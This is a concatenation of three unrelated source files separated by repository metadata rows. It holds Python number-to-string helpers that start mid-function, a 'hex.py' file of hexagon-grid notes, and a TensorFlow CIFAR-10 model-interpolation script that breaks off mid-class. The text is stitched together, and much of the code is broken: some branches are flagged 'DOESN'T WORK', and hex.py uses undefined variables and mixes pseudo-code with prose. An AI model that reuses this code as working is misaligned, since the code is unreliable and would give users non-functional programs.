elif unicode: return digits[0].decode("utf8") + u"." + u"".join(digits[1:]) + u" " + strings.multiplication + u" 10" + strings.superscript(power) # DOESN'T WORK??
else: return digits[0] + "." + "".join(digits[1:]) + " x 10^" + str(power)
else:
result = "{:.0e}".format(integer).replace("+", "").replace("e0", "e")
power = int(result.split("e")[1])
if html: result = result.split("e")[0] + " × 10<sup>" + str(power) + "</sup>"
elif unicode: result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power) # DOESN'T WORK
else: result = result.split("e")[0] + " x 10^" + str(power)
return result
else:
if ndigits is not None: decimal_places = ndigits - 1
if html: return ("{:." + str(decimal_places) + "e}").format(float(integer)).replace("+", "").replace("e0", " × 10<sup>") + "</sup>"
else: return ("{:." + str(decimal_places) + "e}").format(float(integer)).replace("+", "").replace("e0", "e")
# Not scientific
else: return str(integer)
# -----------------------------------------------------------------
#def str_from_integer_range(the_range, scientific=False, decimal_places=2, fancy=False, ndigits=None, unicode=False, **kwargs):
def str_from_integer_range(the_range, **kwargs):
"""
Thi function ...
:param the_range:
:param kwargs:
:return:
"""
min_str = str_from_integer(the_range.min, **kwargs)
max_str = str_from_integer(the_range.max, **kwargs)
return min_str + " > " + max_str
# -----------------------------------------------------------------
def str_from_real(real, **kwargs):
"""
This function ...
:param real:
:param kwargs:
:return:
"""
# Get kwargs
scientific = kwargs.pop("scientific", False)
decimal_places = kwargs.pop("decimal_places", None)
fancy = kwargs.pop("fancy", False)
ndigits = kwargs.pop("ndigits", None)
unicode = kwargs.pop("unicode", False)
doround = kwargs.pop("round", False)
html = kwargs.pop("html", False)
#print(decimal_places, ndigits)
# Check input
if ndigits is not None and ndigits < 1: raise ValueError("Number of digits cannot be smaller than 1")
if ndigits is not None and decimal_places is not None: raise ValueError("Cannot specify both number of decimal places and number of digits")
# Set ndigits and number of decimal places
if ndigits is not None:
if scientific: decimal_places = ndigits - 1
else: pass
elif decimal_places is not None:
if scientific: ndigits = decimal_places + 1
else: pass
else: decimal_places = 2 # default value for when ndigits is not specified
#print(decimal_places, ndigits)
# Scientific notation
if scientific:
# Fancy
if fancy:
if ndigits is not None:
if "e" in str(real): power = int(str(real).split("e")[1])
else: power = len(str(real).split(".")[0]) - 1
digits = []
rounded = numbers.round_to_n_significant_digits(real, ndigits)
str_rounded = str(rounded)
#print(str_rounded)
#if "." in str_rounded: enditeration = ndigits + 1
#else: enditeration = ndigits
if "." in str_rounded: str_rounded = "".join(str_rounded.split("."))
for i in range(ndigits):
digit = str_rounded[i]
#if digit == ".": continue # happens if rounded does stil contain dot
digits.append(digit)
#print("digits", digits)
if html: return digits[0] + "." + "".join(digits[1:]) + " × 10<sup>" + str(power) + "</sup>"
elif unicode: return digits[0].decode("utf8") + u"." + u"".join(digits[1:]) + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8") # DOESN'T WORK??
else: return digits[0] + "." + "".join(digits[1:]) + " x 10^" + str(power)
else:
result = ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", "e")
power = int(result.split("e")[1])
#result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8")
#result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8")
if html: result = result.split("e")[0] + " × 10<sup>" + str(power) + "</sup>"
elif unicode: result = result.split("e")[0].decode("utf8") + u" " + u"x" + u" 10" + strings.superscript(power).decode("utf8") # SOMETHING LIKE THIS?? DOESN'T WORK??
else: result = result.split("e")[0] + " x 10^" + str(power)
return result
else:
if ndigits is not None: decimal_places = ndigits - 1
if html: return ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", " × 10<sup>") + "</sup>"
else: return ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", "e")
else:
if doround:
#numbers.order_of_magnitude()
if ndigits is not None: return repr(numbers.round_to_n_significant_digits(real, ndigits))
else:
primary_ndigits = numbers.order_of_magnitude(real) + 1
ndigits = decimal_places + primary_ndigits
if ndigits < 1:
warnings.warn("The small number '" + repr(real) + "' cannot be represented with only " + str(decimal_places) + " decimal places: using scientific notation")
return str_from_real(real, scientific=True, ndigits=decimal_places+1)
else:
#print(decimal_places, primary_ndigits, ndigits)
return ("{:." + str(ndigits) + "}").format(real)
else: return repr(real)
# -----------------------------------------------------------------
#def str_from_real_range(the_range, scientific=False, decimal_places=2, fancy=False, ndigits=None, unicode=False, **kwargs):
def str_from_real_range(the_range, **kwargs):
"""
This function ...
:param the_range:
:param kwargs:
:return:
"""
min_str = str_from_real(the_range.min, **kwargs)
max_str = str_from_real(the_range.max, **kwargs)
return min_str + " > " + max_str
# -----------------------------------------------------------------
def str_from_coordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.ra, **kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.dec, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_pixelcoordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return repr(coordinate.x) + delimiter + repr(coordinate.y)
# -----------------------------------------------------------------
def str_from_physicalcoordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.x, **kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.y, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_stretch(stretch, **kwargs):
"""
This function ...
:param stretch:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", stretch.ra,
**kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity",
"pts.core.units.stringify",
stretch.dec, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_angle_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_angle(extent.x, **kwargs) + delimiter + str_from_angle(extent.y, **kwargs)
# -----------------------------------------------------------------
def str_from_quantity_extent(extent, **kwargs):
"""
Thisf unction ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", extent.x, **kwargs)[1] + delimiter + \
introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", extent.y, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_integer_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_integer(extent.x, **kwargs) + delimiter + str_from_integer(extent.y, **kwargs)
# -----------------------------------------------------------------
def str_from_real_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_real(extent.x, **kwargs) + delimiter + str_from_real(extent.y, **kwargs)
# -----------------------------------------------------------------
def yes_or_no(boolean, **kwargs):
"""
This function ...
:param boolean:
:param kwargs:
:return:
"""
# Get options
short = kwargs.pop("short", False)
answer = "yes" if boolean else "no"
if short: return answer[0]
else: return answer
# -----------------------------------------------------------------
def str_from_bool(boolean, **kwargs):
"""
This function ...
:param boolean:
:param kwargs:
:return:
"""
# Get options
lower = kwargs.pop("lower", False)
if lower: return str(boolean).lower()
else: return str(boolean)
# -----------------------------------------------------------------
def str_from_angle(angle, **kwargs):
"""
This function ...
:param angle:
:param kwargs:
:return:
"""
return str_from_real(angle.value, **kwargs) + " " + str(angle.unit).replace(" ", "")
# -----------------------------------------------------------------
| agpl-3.0 | -4,237,823,556,950,689,000 | 32.980198 | 229 | 0.577846 | false | 3.923033 | false | false | false |
ZuraK/aVarCode | py_prototyping/hex.py | 1 | 7514 | # File:
# Desc:
import math;
# param: hType, hexType, 0 for Flat topped, 30 if Pointy topped
# param: center, Vector2Point, hex center
# param: radius, size of hex
# param: index, indexPoint corner of hex, 0-5
# returns: Vector2Point hex corner
def GeneratePointHEX(hType, center, radius, index):
vec[0];
angle_deg = 60 * index + hType; # 0 if Flat, 30 if Pointy
angle_rad = math.pi / 180 * angle_deg;
vec[0].x = center.x + size * cos(angle_rad);
vec[0].y = center.y + size * sin(angle_rad);
return vec;
# param: hType, hexType, 0 for Flat topped, 30 if Pointy topped
# param: center, Vector2Point, hex center
# param: radius, size of hex
# returns: Vector2[] hex corners
def GenerateVectorsHEX(hType, center, radius):
vec[0];
for val in range(6):
angle_deg = 60 * val + hType; # 0 if Flat, 30 if Pointy
angle_rad = math.pi / 180 * angle_deg;
vec[val].x = center.x + size * cos(angle_rad);
vec[val].y = center.y + size * sin(angle_rad);
return vec;
def PrintInfo():
print "=====[[ Hexagons ]]=====";
print "(00) Definitons, Equations, ";
print "(01) Storage, Tables, "
print "(02) Generation, ";
return;
# HexEdges, Indices
# A 0,1;
# B 1,2;
# C 2,3;
# D 3,4;
# E 4,5;
# F 5,0;
# HexTriangles, Indices (Index 6 as Center)
# A 6,0,1;
# B 6,1,2;
# etc
# Triangle Fan -> Center(0),First(1),Second(2), ...
# Hexagon area:
# A = ((3 sqrt 3) / 2 ) size^2
# Perimeter: 6 * size
# Slices 60 deg, 60 deg, 60 deg
# Total internal angles: 720 deg
# Internal angle: 120 deg
#
dirs:
flat
Lines: East, SouthEast, SouthWest, West, NorthWest, NorthEast
Edges: SouthEast, South, SouthWest, NorthWest, North, NorthEast
pointy
Lines: SouthEast, South, SouthWest, NorthWest, North, NorthEast
Edges: East, SouthEast, SouthWest, West, NorthWest, NorthEast
# Unicode Character 'WHITE HEXAGON' (U+2B21)
# HTML Entity (decimal) ⬡
# HTML Entity (hex) ⬡
# How to type in Microsoft Windows Alt +2B21
# UTF-8 (hex) 0xE2 0xAC 0xA1 (e2aca1)
# UTF-8 (binary) 11100010:10101100:10100001
# UTF-16 (hex) 0x2B21 (2b21)
# UTF-16 (decimal) 11,041
# UTF-32 (hex) 0x00002B21 (2B21)
# UTF-32 (decimal) 11,041
# C/C++/Java source code "\u2B21"
# Python source code u"\u2B21"
# Unicode Character 'BLACK HEXAGON' (U+2B22)
# HTML Entity (decimal) ⬢
# HTML Entity (hex) ⬢
# How to type in Microsoft Windows Alt +2B22
# UTF-8 (hex) 0xE2 0xAC 0xA2 (e2aca2)
# UTF-8 (binary) 11100010:10101100:10100010
# UTF-16 (hex) 0x2B22 (2b22)
# UTF-16 (decimal) 11,042
# UTF-32 (hex) 0x00002B22 (2b22)
# UTF-32 (decimal) 11,042
# C/C++/Java source code "\u2B22"
# Python source code u"\u2B22"
# hex grid flat, vertical orientation
# Width = HexSize * 2
# horiz = width * 3/4
# height = sqrt(3)/2 * width.
# dist vertical = height.
# hex grid pointy, horizontal orientation
# height = hxsize * 2
# vert = height * 3/4
# width = sqrt(3)/2 * height.
# dist horiz = width.
offset coords
# Pointy top Pointy top
# "odd-r" Horizontal layout "even-r" Horizontal layout
# (0,0) (1,0) (2,0) (3,0) (4,0) (0,0) (1,0) (2,0) (3,0) (4,0)
# (0,1) (1,1) (2,1) (3,1) (4,1) (0,1) (1,1) (2,1) (3,1) (4,1)
# (0,2) (1,2) (2,2) (3,2) (4,2) (0,2) (1,2) (2,2) (3,2) (4,2)
# (0,3) (1,3) (2,3) (3,3) (4,3) (0,3) (1,3) (2,3) (3,3) (4,3)
# (0,4) (1,4) (2,4) (3,4) (4,4) (0,4) (1,4) (2,4) (3,4) (4,4)
# Flat top Flat top
# "odd-q" Vertical layout "even-q" Vertical layout
# (0,0) (2,0) (4,0) (1,0) (3,0) (5,0)
# (1,0) (3,0) (5,0) (0,0) (2,0) (4,0)
# (0,1) (2,1) (4,1) (1,1) (3,1) (5,1)
# (1,1) (3,1) (4,1) (0,1) (2,1) (4,1)
# (0,2) (2,2) (4,2) (1,2) (3,2) (5,2)
# (1,2) (3,2) (5,2) (0,2) (2,2) (4,2)
cube coords
axial coords
interlaced/doubled coords
Coord conversions::
function cube_to_hex(h): # axial
var q = h.x
var r = h.z
return Hex(q, r)
function hex_to_cube(h): # axial
var x = h.q
var z = h.r
var y = -x-z
return Cube(x, y, z)
# convert cube to even-q offset
col = x
row = z + (x + (x&1)) / 2
# convert even-q offset to cube
x = col
z = row - (col + (col&1)) / 2
y = -x-z
# convert cube to odd-q offset
col = x
row = z + (x - (x&1)) / 2
# convert odd-q offset to cube
x = col
z = row - (col - (col&1)) / 2
y = -x-z
# convert cube to even-r offset
col = x + (z + (z&1)) / 2
row = z
# convert even-r offset to cube
x = col - (row + (row&1)) / 2
z = row
y = -x-z
# convert cube to odd-r offset
col = x + (z - (z&1)) / 2
row = z
# convert odd-r offset to cube
x = col - (row - (row&1)) / 2
z = row
y = -x-z
NEIGHBOURS::
>>cube<<
var directions = [
Cube(+1, -1, 0), Cube(+1, 0, -1), Cube( 0, +1, -1),
Cube(-1, +1, 0), Cube(-1, 0, +1), Cube( 0, -1, +1)
]
function cube_direction(direction):
return directions[direction]
function cube_neighbor(hex, direction):
return cube_add(hex, cube_direction(direction))
>>axial<<
var directions = [
Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1)
]
function hex_direction(direction):
return directions[direction]
function hex_neighbor(hex, direction):
var dir = hex_direction(direction)
return Hex(hex.q + dir.q, hex.r + dir.r)
>>offset<< (4 different implementations depending on grid type)
>>odd-r<<
var directions = [
[ Hex(+1, 0), Hex( 0, -1), Hex(-1, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ],
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, 0), Hex( 0, +1), Hex(+1, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.row & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>even-r<<
var directions = [
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, 0), Hex( 0, +1), Hex(+1, +1) ],
[ Hex(+1, 0), Hex( 0, -1), Hex(-1, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.row & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>odd-q<<
var directions = [
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, -1), Hex(-1, 0), Hex( 0, +1) ],
[ Hex(+1, +1), Hex(+1, 0), Hex( 0, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.col & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>even-q<<
var directions = [
[ Hex(+1, +1), Hex(+1, 0), Hex( 0, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ],
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, -1), Hex(-1, 0), Hex( 0, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.col & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>Diagonals<<
var diagonals = [
Cube(+2, -1, -1), Cube(+1, +1, -2), Cube(-1, +2, -1),
Cube(-2, +1, +1), Cube(-1, -1, +2), Cube(+1, -2, +1)
]
function cube_diagonal_neighbor(hex, direction):
return cube_add(hex, diagonals[direction])
| gpl-2.0 | -3,974,613,827,194,157,600 | 25.090278 | 69 | 0.534602 | false | 2.438027 | false | false | false |
danielfreeman11/convex-nets | LaunchScripts/CIFAR10.py | 1 | 29360 | #Imports and model parameters
from __future__ import absolute_import
from __future__ import division
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
#mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
#Toy data generator kept from earlier experiments: given three integer coefficients a,b,c in [-100,100],
#choose random x-values and evaluate the quadratic function a*x^2 + b*x + c at those values.
import copy
from datetime import datetime
import os.path
import time
import math
import gzip
import os
import re
import sys
import tarfile
from six.moves import urllib
from tensorflow.models.image.cifar10 import cifar10_input
from tensorflow.models.image.cifar10 import cifar10
for num_run in xrange(1):
alpha,hidden_dim,hidden_dim2 = (.001,4,4)
thresh = .95
if num_run%4 == 0:
thresh = .8
if num_run%4 == 1:
thresh = .6
if num_run%4 == 2:
thresh = .4
if num_run%4 == 3:
thresh = .35
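    # Note: with xrange(1) above only num_run == 0 executes, so thresh is effectively 0.8;
    # the remaining branches only matter if the number of runs is increased.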
cost_thresh = 1.0
# Parameters
learning_rate = 0.001
training_epochs = 15
#batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
    n_input = 784 # 28*28, i.e. a flattened MNIST image (kept from the MNIST version of this script)
    n_classes = 10 # number of output classes (10 for both MNIST and CIFAR-10)
#synapses = []
#from __future__ import print_function
tf.logging.set_verbosity(tf.logging.FATAL)
FLAGS = tf.app.flags.FLAGS
# Basic model parameters.
batch_size = 128
data_dir = '/tmp/cifar10_data'
use_fp16 = False
    train_dir = '/tmp/cifar10_train'
    max_steps = 1000000
    num_examples = 10000
    log_device_placement = False
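    # These plain Python variables appear to mirror the tf.app.flags options used by the
    # TensorFlow CIFAR-10 tutorial (cifar10.py / cifar10_train.py); FLAGS itself is kept
    # above, but the values are held here as local variables rather than parsed flags.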
# Global constants describing the CIFAR-10 data set.
IMAGE_SIZE = cifar10_input.IMAGE_SIZE
NUM_CLASSES = cifar10_input.NUM_CLASSES
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = cifar10_input.NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = cifar10_input.NUM_EXAMPLES_PER_EPOCH_FOR_EVAL
# Constants describing the training process.
MOVING_AVERAGE_DECAY = 0.9999 # The decay to use for the moving average.
NUM_EPOCHS_PER_DECAY = 350.0 # Epochs after which learning rate decays.
LEARNING_RATE_DECAY_FACTOR = 0.1 # Learning rate decay factor.
INITIAL_LEARNING_RATE = 0.1 # Initial learning rate.
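    # In the CIFAR-10 tutorial these constants drive an exponential learning-rate schedule.
    # A sketch of how they combine (assuming the tutorial's cifar10.train() is used):
    #   decay_steps = (NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN / batch_size) * NUM_EPOCHS_PER_DECAY
    #   lr = INITIAL_LEARNING_RATE * LEARNING_RATE_DECAY_FACTOR ** floor(global_step / decay_steps)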
# If a model is trained with multiple GPUs, prefix all Op names with tower_name
# to differentiate the operations. Note that this prefix is removed from the
# names of the summaries when visualizing a model.
TOWER_NAME = 'tower'
DATA_URL = 'http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz'
models = []
#Testing starting in the same place
#synapse0 = 2*np.random.random((1,hidden_dim)) - 1
#synapse1 = 2*np.random.random((hidden_dim,hidden_dim2)) - 1
#synapse2 = 2*np.random.random((hidden_dim2,1)) - 1
#Function definitions
def func(x,a,b,c):
return x*x*a + x*b + c
def flatten(x):
result = []
for el in x:
if hasattr(el, "__iter__") and not isinstance(el, basestring):
result.extend(flatten(el))
else:
result.append(el)
return result
def generatecandidate4(a,b,c,tot):
candidate = [[np.random.random() for x in xrange(1)] for y in xrange(tot)]
candidatesolutions = [[func(x[0],a,b,c)] for x in candidate]
return (candidate, candidatesolutions)
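#synapse_interpolate and model_interpolate linearly interpolate between two sets of parameters:
#t=0 returns the first model's weights/biases, t=1 returns the second's.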
def synapse_interpolate(synapse1, synapse2, t):
return (synapse2-synapse1)*t + synapse1
def model_interpolate(w1,b1,w2,b2,t):
m1w = w1
m1b = b1
m2w = w2
m2b = b2
mwi = [synapse_interpolate(m1we,m2we,t) for m1we, m2we in zip(m1w,m2w)]
mbi = [synapse_interpolate(m1be,m2be,t) for m1be, m2be in zip(m1b,m2b)]
return mwi, mbi
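#InterpBeadError sweeps t over 20 evenly spaced points between the two parameter sets, builds an
#interpolated convnet at each point, estimates its CIFAR-10 test precision from 20 batches, and
#returns the largest error found along the path together with the index where it occurred.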
def InterpBeadError(w1,b1, w2,b2, write = False, name = "00"):
errors = []
#xdat,ydat = generatecandidate4(.5, .25, .1, 1000)
#xdat,ydat = mnist.train.next_batch(1000)
#xdat = mnist.test.images
#ydat = mnist.test.labels
#xdat = np.array(xdat)
#ydat = np.array(ydat)
for tt in xrange(20):
#print tt
#accuracy = 0.
t = tt/20.
thiserror = 0
#x0 = tf.placeholder("float", [None, n_input])
#y0 = tf.placeholder("float", [None, n_classes])
weights, biases = model_interpolate(w1,b1,w2,b2, t)
#interp_model = multilayer_perceptron(w=weights, b=biases)
interp_model = convnet(w=weights, b=biases)
with interp_model.g.as_default():
xdat, ydat = cifar10.inputs(eval_data='test')
logit_test = interp_model.predict(xdat)
top_k_op = tf.nn.in_top_k(logit_test, ydat, 1)
pred = interp_model.predict(xdat)
init = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
num_iter = 20
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
step = 0
while step < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
step += 1
precision = true_count / total_sample_count
print "Accuracy:", precision
#,"\t",tt,weights[0][1][0],weights[0][1][1]
thiserror = 1 - precision
errors.append(thiserror)
if write == True:
with open("f" + str(name) + ".out",'w+') as f:
for e in errors:
f.write(str(e) + "\n")
return max(errors), np.argmax(errors)
def _activation_summary(x):
"""Helper to create summaries for activations.
Creates a summary that provides a histogram of activations.
Creates a summary that measures the sparsity of activations.
Args:
x: Tensor
Returns:
nothing
"""
# Remove 'tower_[0-9]/' from the name in case this is a multi-GPU training
# session. This helps the clarity of presentation on tensorboard.
tensor_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', x.op.name)
tf.histogram_summary(tensor_name + '/activations', x)
tf.scalar_summary(tensor_name + '/sparsity', tf.nn.zero_fraction(x))
def _variable_on_cpu(name, shape, initializer):
"""Helper to create a Variable stored on CPU memory.
Args:
name: name of the variable
shape: list of ints
initializer: initializer for Variable
Returns:
Variable Tensor
"""
with tf.device('/cpu:0'):
dtype = tf.float16 if False else tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
return var
def _variable_with_weight_decay(name, shape, stddev, wd):
"""Helper to create an initialized Variable with weight decay.
Note that the Variable is initialized with a truncated normal distribution.
A weight decay is added only if one is specified.
Args:
name: name of the variable
shape: list of ints
stddev: standard deviation of a truncated Gaussian
wd: add L2Loss weight decay multiplied by this float. If None, weight
decay is not added for this Variable.
Returns:
Variable Tensor
"""
dtype = tf.float16 if False else tf.float32
var = _variable_on_cpu(
name,
shape,
tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
if wd is not None:
weight_decay = tf.mul(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def distorted_inputs():
"""Construct distorted input for CIFAR training using the Reader ops.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
Raises:
ValueError: If no data_dir
"""
if not FLAGS.data_dir:
raise ValueError('Please supply a data_dir')
data_dir = os.path.join(FLAGS.data_dir, 'cifar-10-batches-bin')
images, labels = cifar10_input.distorted_inputs(data_dir=data_dir,
batch_size=FLAGS.batch_size)
if False:
images = tf.cast(images, tf.float16)
labels = tf.cast(labels, tf.float16)
return images, labels
def inputs(eval_data):
"""Construct input for CIFAR evaluation using the Reader ops.
Args:
eval_data: bool, indicating if one should use the train or eval data set.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
Raises:
ValueError: If no data_dir
"""
if not FLAGS.data_dir:
raise ValueError('Please supply a data_dir')
data_dir = os.path.join(FLAGS.data_dir, 'cifar-10-batches-bin')
images, labels = cifar10_input.inputs(eval_data=eval_data,
data_dir=data_dir,
batch_size=FLAGS.batch_size)
if False:
images = tf.cast(images, tf.float16)
labels = tf.cast(labels, tf.float16)
return images, labels
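#Note: distorted_inputs() and inputs() above mirror the helpers in the cifar10 module; the
#training and evaluation code below calls cifar10.distorted_inputs()/cifar10.inputs() directly,
#so these local copies appear to be kept only for reference.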
#Class definitions
class convnet():
def __init__(self, w=0, b=0, ind='00'):
self.index = ind
learning_rate = .001
training_epochs = 15
batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # Guess quadratic function
n_classes = 10 #
self.g = tf.Graph()
self.params = []
with self.g.as_default():
#Note that by default, weights and biases will be initialized to random normal dists
if w==0:
self.weights = {
'c1': _variable_with_weight_decay('c1',shape=[5, 5, 3, 64],stddev=5e-2,wd=0.0),
'c2': _variable_with_weight_decay('c2',shape=[5, 5, 64, 64],stddev=5e-2,wd=0.0),
'fc1': _variable_with_weight_decay('fc1', shape=[2304, 384],stddev=0.04, wd=0.004),
'fc2': _variable_with_weight_decay('fc2', shape=[384, 192],stddev=0.04, wd=0.004),
'out': _variable_with_weight_decay('out', [192, NUM_CLASSES],stddev=1/192.0, wd=0.0)
}
self.weightslist = [self.weights['c1'],self.weights['c2'],self.weights['fc1'],self.weights['fc2'],self.weights['out']]
self.biases = {
'b1': _variable_on_cpu('b1', [64], tf.constant_initializer(0.0)),
'b2': _variable_on_cpu('b2', [64], tf.constant_initializer(0.1)),
'b3': _variable_on_cpu('b3', [384], tf.constant_initializer(0.1)),
'b4': _variable_on_cpu('b4', [192], tf.constant_initializer(0.1)),
'out': _variable_on_cpu('bo', [NUM_CLASSES],tf.constant_initializer(0.0))
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['b3'],self.biases['b4'],self.biases['out']]
else:
self.weights = {
'c1': tf.Variable(w[0]),
'c2': tf.Variable(w[1]),
'fc1': tf.Variable(w[2]),
'fc2': tf.Variable(w[3]),
'out': tf.Variable(w[4])
}
self.weightslist = [self.weights['c1'],self.weights['c2'],self.weights['fc1'],self.weights['fc2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'b3': tf.Variable(b[2]),
'b4': tf.Variable(b[3]),
'out': tf.Variable(b[4])
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['b3'],self.biases['b4'],self.biases['out']]
self.saver = tf.train.Saver()
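#predict() builds the standard CIFAR-10 tower: conv(5x5, 64 filters) -> ReLU -> max-pool -> LRN,
#then conv(5x5, 64) -> ReLU -> LRN -> max-pool, followed by two fully connected ReLU layers
#(384 and 192 units) and a final linear layer producing the class logits.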
def predict(self, x):
with self.g.as_default():
layer_1 = tf.nn.conv2d(x, self.weights['c1'], [1, 1, 1, 1], padding='SAME')
layer_1 = tf.nn.bias_add(layer_1, self.biases['b1'])
layer_1 = tf.nn.relu(layer_1, name='layer_1')
#_activation_summary(layer_1)
pool_1 = tf.nn.max_pool(layer_1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1],padding='SAME', name='pool1')
norm_1 = tf.nn.lrn(pool_1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,name='norm1')
layer_2 = tf.nn.conv2d(norm_1, self.weights['c2'], [1, 1, 1, 1], padding='SAME')
layer_2 = tf.nn.bias_add(layer_2, self.biases['b2'])
layer_2 = tf.nn.relu(layer_2, name='layer_2')
#_activation_summary(layer_2)
norm_2 = tf.nn.lrn(layer_2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,name='norm2')
pool_2 = tf.nn.max_pool(norm_2, ksize=[1, 3, 3, 1],strides=[1, 2, 2, 1], padding='SAME', name='pool2')
reshape = tf.reshape(pool_2, [FLAGS.batch_size, -1])
layer_3 = tf.nn.relu(tf.matmul(reshape, self.weights['fc1']) + self.biases['b3'], name='fc1')
#_activation_summary(layer_3)
layer_4 = tf.nn.relu(tf.matmul(layer_3, self.weights['fc2']) + self.biases['b4'], name='fc2')
#_activation_summary(layer_4)
out_layer = tf.add(tf.matmul(layer_4, self.weights['out']), self.biases['out'], name='out')
#_activation_summary(out)
return out_layer
def ReturnParamsAsList(self):
with self.g.as_default():
with tf.Session() as sess:
# Restore variables from disk
self.saver.restore(sess, "/home/dfreeman/PythonFun/tmp/model"+str(self.index)+".ckpt")
return sess.run(self.weightslist), sess.run(self.biaseslist)
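#The fully connected multilayer_perceptron class below appears to be retained from an MNIST
#version of this experiment; the CIFAR-10 runs further down only instantiate convnet.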
class multilayer_perceptron():
#weights = {}
#biases = {}
def __init__(self, w=0, b=0, ind='00'):
self.index = ind #used for reading values from file
#See the filesystem convention below (is this really necessary?)
#I'm going to eschew writing to file for now because I'll be generating too many files
#Currently, the last value of the parameters is stored in self.params to be read
learning_rate = 0.001
training_epochs = 15
batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # Guess quadratic function
n_classes = 10 #
self.g = tf.Graph()
self.params = []
with self.g.as_default():
#Note that by default, weights and biases will be initialized to random normal dists
if w==0:
self.weights = {
'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
